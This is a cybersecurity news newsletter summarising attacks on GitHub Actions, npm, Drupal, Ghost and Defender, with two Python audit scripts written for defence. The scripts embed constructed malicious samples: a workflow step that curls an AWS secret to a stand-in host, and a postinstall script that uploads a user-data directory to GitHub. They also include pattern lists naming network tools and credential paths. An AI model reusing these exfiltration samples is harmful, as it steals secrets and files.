May 29 2026

Welcome to Gone Phishing, where the only thing getting hooked is bad actors. No bots, no fluff, just the week's most dangerous catches. 🎣
Most AI creative tools fall short for one simple reason. You can generate tons of ads, but they aren’t up to par.
Refining copy, adjusting layouts, or nudging a CTA into place shouldn’t require rewriting prompts over and over. It slows teams down and breaks the creative process.
With Hightouch Ad Studio, AI gets you 90% of the way there. For the final 10%, use a built-in editor to quickly refine copy and design, or export directly to Figma for seamless collaboration with your design team.
Move faster without losing control. Every ad, exactly how you want it.
1. 'Megalodon' Supply Chain Attack Backdoors 5,500+ GitHub Repos
An automated campaign pushed 5,718 malicious commits to 5,561 GitHub repos in ~6 hours on May 18, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys and OIDC tokens. Forged "ci-bot"/"build-bot" identities disguised it as routine maintenance; it spread downstream via poisoned packages like @tiledesk/tiledesk. Audit workflow changes, rotate CI/CD secrets, pin/verify Actions.
Read more → Dark Reading
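The item's mitigation (audit workflow changes, pin/verify Actions) is easy to automate on a pull request. The Python below is an added example, not code from the article, Dark Reading or GitHub: it scans a workflow file for two things an injected workflow of the kind described would show, a `uses:` reference that is not pinned to a full commit SHA, and a step that exposes a repository secret and also invokes a network tool. The sample workflow, the placeholder SHA and the `cache.example.invalid` URL are constructed for the example; the step splitting is a line-based heuristic, not a YAML parse.

```python
import re

# Constructed sample workflow, modelled on the injected-workflow behaviour the
# article describes (a step that hands a repository secret to curl). The action
# names, the 40-hex SHA and the upload URL are placeholders for the example.
WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@1a4442cacd436585916779262731d5b162bc6ec7
      - name: Build
        run: npm ci && npm run build
      - name: Sync cache
        env:
          TOKEN: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST -d "$TOKEN" https://cache.example.invalid/upload
"""

SHA40 = re.compile(r"^[0-9a-f]{40}$")
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
# A step begins on a YAML list item keyed by one of the usual step fields.
STEP_START = re.compile(r"^\s*-\s+(?:name|uses|run|id|if|env|with):")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
NET_TOOL = re.compile(r"\b(?:curl|wget|nc|ncat|Invoke-WebRequest)\b")


def unpinned_actions(text):
    """Return (line, ref) for every `uses:` that is not pinned to a full commit SHA."""
    out = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local and docker refs are not tag-resolved from GitHub
        action, _, version = ref.rpartition("@")
        if not action or not SHA40.match(version):
            out.append((n, ref))
    return out


def steps(text):
    """Yield (start_line, chunk) per step, splitting on list items (heuristic)."""
    lines = text.splitlines()
    starts = [i for i, l in enumerate(lines) if STEP_START.match(l)]
    for k, s in enumerate(starts):
        e = starts[k + 1] if k + 1 < len(starts) else len(lines)
        yield s + 1, "\n".join(lines[s:e])


def secret_to_network(text):
    """Return (step_line, secret) for steps that expose a secret and call a network tool."""
    out = []
    for start, chunk in steps(text):
        s = SECRET_REF.search(chunk)
        if s and NET_TOOL.search(chunk):
            out.append((start, s.group(0)))
    return out


def audit(text):
    """Combined findings as (kind, line, detail) tuples."""
    return ([("unpinned-action", n, ref) for n, ref in unpinned_actions(text)]
            + [("secret-to-network", n, sec) for n, sec in secret_to_network(text)])


if __name__ == "__main__":
    for kind, line, detail in audit(WORKFLOW):
        print(f"{kind}: line {line}: {detail}")
```

Run it over every file under `.github/workflows/` that a commit touches, and treat any finding on a commit from an unfamiliar author (the article's forged "ci-bot"/"build-bot" identities) as a blocker. The secret-to-network check will also flag legitimate steps that pass `secrets.GITHUB_TOKEN` to curl, so review those rather than suppressing the rule.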
2. Carnival Confirms Data Breach Affecting Nearly 6 Million People
Carnival is notifying ~5.99M people that names, addresses, DOBs, contact details and government IDs were stolen after an employee account was socially engineered on April 14. ShinyHunters claimed 8.7M records and leaked data in late April; notifications began May 27 with 24 months of credit monitoring.
Read more → SecurityWeek
3. FBI: 'Silent Ransom Group' Sends Operatives In Person to Steal Law Firm Data
The FBI warned SRG is posing as internal IT to gain remote access to U.S. law firms — and, when that fails, physically sending someone to plug in a storage device. Legal is now the 4th most-targeted ransomware sector in 2026. Brief helpdesk/reception staff and tighten USB/physical-access controls.
Read more → BleepingComputer
4. Drupal Core SQL Injection (CVE-2026-9082) Under Active Attack, Added to CISA KEV
A highly critical SQLi in Drupal's DB API is being exploited within 48 hours of patch; Imperva logged 15,000+ attempts on ~6,000 sites across 65 countries. PostgreSQL-backed sites only (~5% of installs) but enables data theft, privesc and RCE. CISA KEV-listed May 22, federal deadline May 29 — patch now.
Read more → The Hacker News
5. Ghost CMS Flaw (CVE-2026-26980) Hijacks 700+ Sites for ClickFix
A CVSS 9.4 unauthenticated SQLi in Ghost's Content API is being used to steal admin API keys and inject JS into 700+ sites — Harvard, Oxford, Auburn, DuckDuckGo among them — serving fake "verify you're human" ClickFix prompts that drop loaders and Electron malware. Upgrade to Ghost 6.19.1+ and rotate all API keys.
Read more → BleepingComputer
6. Microsoft Defender Zero-Days 'UnDefend' & 'RedSun' Exploited to Blind AV
Two actively exploited Defender flaws — UnDefend (CVE-2026-45498) and RedSun (CVE-2026-41091) — can be triggered remotely to crash/disable the scanning engine, killing real-time protection. Fixes ship via engine 1.1.26040.8 / 4.18.26040.7; both on CISA KEV with a June 3 deadline. Confirm Defender auto-updates applied.
Read more → SecurityWeek
7. Malicious npm Package Steals Files From Claude AI's User Directory
"mouse5212-super-formatter" posed as a deployment-sync utility but uploaded files from /mnt/user-data — Claude's upload/output directory — to attacker GitHub repos, reaching 676 downloads before removal. The AI-generated malware hardcoded its own GitHub token, letting OX Security trace it. AI tooling is now a supply-chain target.
Read more → The Hacker News
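The behaviours in this item (an install-time script, a read of a sensitive directory, an outbound upload and a hardcoded GitHub token) are all visible in the package contents before anything runs. The Python below is an added example, not code from the article, OX Security or npm: given the extracted files of a package as a filename-to-text mapping, it flags lifecycle install hooks in package.json, well-known token formats, references to sensitive paths, and files that both read the filesystem and make outbound requests. The package name, the `ghp_` token and the JavaScript are constructed placeholders, not the real package.

```python
import json
import re

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Public token formats; the GitHub PAT prefix and AWS access-key prefix are documented formats.
TOKEN_PATTERNS = {
    "github-pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "aws-access-key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}
SENSITIVE_PATHS = ("/mnt/user-data", "/.ssh", ".npmrc", ".aws/credentials")
FILE_READ = re.compile(r"\b(?:readFileSync|readFile|createReadStream|readdirSync)\b")
NET_SEND = re.compile(r"\b(?:https?\.request|fetch\(|axios\.|net\.connect)")

# Constructed package contents modelled on the article's description. The name,
# token value and repository path are placeholders invented for this example.
MALICIOUS_FILES = {
    "package.json": json.dumps({
        "name": "example-super-formatter",
        "version": "1.0.3",
        "scripts": {"postinstall": "node sync.js", "test": "echo ok"},
    }),
    "sync.js": (
        "const fs = require('fs');\n"
        "const https = require('https');\n"
        "const token = 'ghp_EXAMPLEPLACEHOLDER" + "0" * 18 + "';\n"
        "for (const f of fs.readdirSync('/mnt/user-data')) {\n"
        "  const body = fs.readFileSync('/mnt/user-data/' + f);\n"
        "  https.request({host: 'api.github.com', path: '/repos/x/y/contents/' + f,\n"
        "    method: 'PUT', headers: {Authorization: 'token ' + token}}).end(body);\n"
        "}\n"
    ),
}

# A benign package for contrast: no install hooks, no secrets, no I/O.
CLEAN_FILES = {
    "package.json": json.dumps({"name": "example-formatter", "version": "2.0.0",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s) => s.trim();\n",
}


def audit_package(files):
    """Return a list of {file, kind, detail} findings for an extracted npm package."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:
            findings.append({"file": "package.json", "kind": "install-hook",
                             "detail": f"{hook}: {cmd}"})
    for name, text in files.items():
        if name == "package.json":
            continue
        for label, pat in TOKEN_PATTERNS.items():
            for m in pat.finditer(text):
                # Redact the token in the finding so reports do not spread it further.
                findings.append({"file": name, "kind": "hardcoded-token",
                                 "detail": f"{label} {m.group(0)[:8]}..."})
        for p in SENSITIVE_PATHS:
            if p in text:
                findings.append({"file": name, "kind": "sensitive-path", "detail": p})
        if FILE_READ.search(text) and NET_SEND.search(text):
            findings.append({"file": name, "kind": "read-then-send",
                             "detail": "file read and outbound request in the same file"})
    return findings


if __name__ == "__main__":
    for f in audit_package(MALICIOUS_FILES):
        print(f"{f['file']}: {f['kind']}: {f['detail']}")
```

The install-hook check is the one worth wiring into CI first: a package that needs a `postinstall` script to "sync deployments" should be justified in review, and `npm install --ignore-scripts` in build pipelines removes the execution path entirely while the other findings are triaged.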
8. Glassworm Developer Botnet Disrupted in CrowdStrike–Google–Shadowserver Takedown
Researchers cut four resilient C2 channels (Solana blockchain + BitTorrent DHT) used by Glassworm, which since Oct 2025 pushed malicious VS Code/OpenVSX extensions and npm/GitHub artifacts to steal crypto wallets and dev credentials — one March wave tainted 400+ artifacts. A rare win against takedown-resistant infrastructure.
Read more → BleepingComputer
9. Latin American Crews Plunder Government Citizen Data; Uruguay Leak Hits 5.8M
Cybercriminals across LatAm are increasingly breaching government agencies/contractors to monetize citizen data — making public administration the region's most-breached sector — pivoting to "pure extortion" without encryption. Latest: a 5.8M-record Uruguay leak after "La Pampa Leaks" compromised an Antel-managed national identity service.
Read more → Dark Reading
10. cPanel LiteSpeed Plugin Privilege-Escalation Flaw (CVE-2026-48172) Added to CISA KEV
CISA added CVE-2026-48172, a privesc flaw in the LiteSpeed cPanel plugin, to KEV on May 26 on confirmed in-the-wild exploitation. Given LiteSpeed/cPanel's huge hosting footprint, it offers a path to escalate on multi-tenant web servers. Hosting providers and LiteSpeed site owners should patch and review logs.
Read more → CISA
Key Themes This Week
Software supply chain is the main battleground — Megalodon's GitHub Actions poisoning, the Claude-targeting npm package, and the Glassworm takedown all centre on developer tooling/CI-CD.
The exploitation window keeps shrinking — Drupal attacked within 48h of patch, Ghost CMS and two Defender zero-days live, and multiple fresh CISA KEV additions leave little room to defer patching.
Extortion is going physical and data-only — SRG is walking into law firms; LatAm crews and ShinyHunters (Carnival) skip encryption for high-volume data theft and pure extortion.

Claude.ai is one thing. Claude Cowork with MCP connections, running agentic workflows, taking actions across your data with ungoverned skills? That is a different conversation entirely, and most security teams are not equipped to govern it.
Harmonic Security is built to secure everything Claude offers. Full browser controls for Claude.ai, deep governance over agentic MCP workflows, and real-time visibility into what Claude is doing across your organization. So your CISO can say yes to the tools your business is already demanding.
Get the guide: Securing Claude Cowork for the enterprise.

Let us know what you think.
So long and thanks for reading all the phish!
